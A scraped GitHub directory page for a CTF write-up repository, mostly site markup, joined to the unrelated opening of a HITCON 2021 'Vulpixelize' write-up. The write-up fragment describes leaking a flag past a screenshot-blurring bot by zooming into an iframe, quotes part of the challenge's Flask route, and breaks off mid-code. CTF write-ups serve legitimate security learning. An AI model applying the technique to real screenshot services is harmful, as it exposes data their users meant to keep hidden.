<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>2</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/uac-ctf/MetaRed2021-5th-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":439026600,"originating_url":"https://github.com/uac-ctf/MetaRed2021-5th-Writeups/tree/master/forensics/its_full_of_bits","user_id":null}}" data-hydro-click-hmac="532783651fa15b911bda8751eaa168cbcbe022c00c558f87ee6f8a1cb6fdbfc4"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/uac-ctf/MetaRed2021-5th-Writeups/refs" cache-key="v0:1639666362.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="dWFjLWN0Zi9NZXRhUmVkMjAyMS01dGgtV3JpdGV1cHM=" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/uac-ctf/MetaRed2021-5th-Writeups/refs" cache-key="v0:1639666362.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="dWFjLWN0Zi9NZXRhUmVkMjAyMS01dGgtV3JpdGV1cHM=" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>MetaRed2021-5th-Writeups</span></span></span><span>/</span><span><span>forensics</span></span><span>/</span>its_full_of_bits<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>MetaRed2021-5th-Writeups</span></span></span><span>/</span><span><span>forensics</span></span><span>/</span>its_full_of_bits<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/uac-ctf/MetaRed2021-5th-Writeups/tree-commit/a9738a927830021792e5222346dda1d6e1d061c4/forensics/its_full_of_bits" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/uac-ctf/MetaRed2021-5th-Writeups/file-list/master/forensics/its_full_of_bits"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="Directory" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-directory-fill hx_color-icon-directory"> <path d="M1.75 1A1.75 1.75 0 0 0 0 2.75v10.5C0 14.216.784 15 1.75 15h12.5A1.75 1.75 0 0 0 16 13.25v-8.5A1.75 1.75 0 0 0 14.25 3H7.5a.25.25 0 0 1-.2-.1l-.9-1.2C6.07 1.26 5.55 1 5 1H1.75Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>its_full_of_bits</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# HITCON 2021 - Vulpixelize (232 points)
My solution for this challenge is maybe unintended and not very technical, but it works :) TDLR : I created an iframe and zoom on it enough to exfiltrate the flag although there is a blurring
---
We can send a URL that the bot will visit. It then takes a screenshot of the page, blurs it and returns us the result :
```[email protected]('/submit', methods=['GET'])def submit(): path = 'static/images/%s.png' % uuid.uuid4().hex url = request.args.get('url') if url: # secrity check if not url.startswith('http://') and not url.startswith('https://'): return message(msg='malformed url')
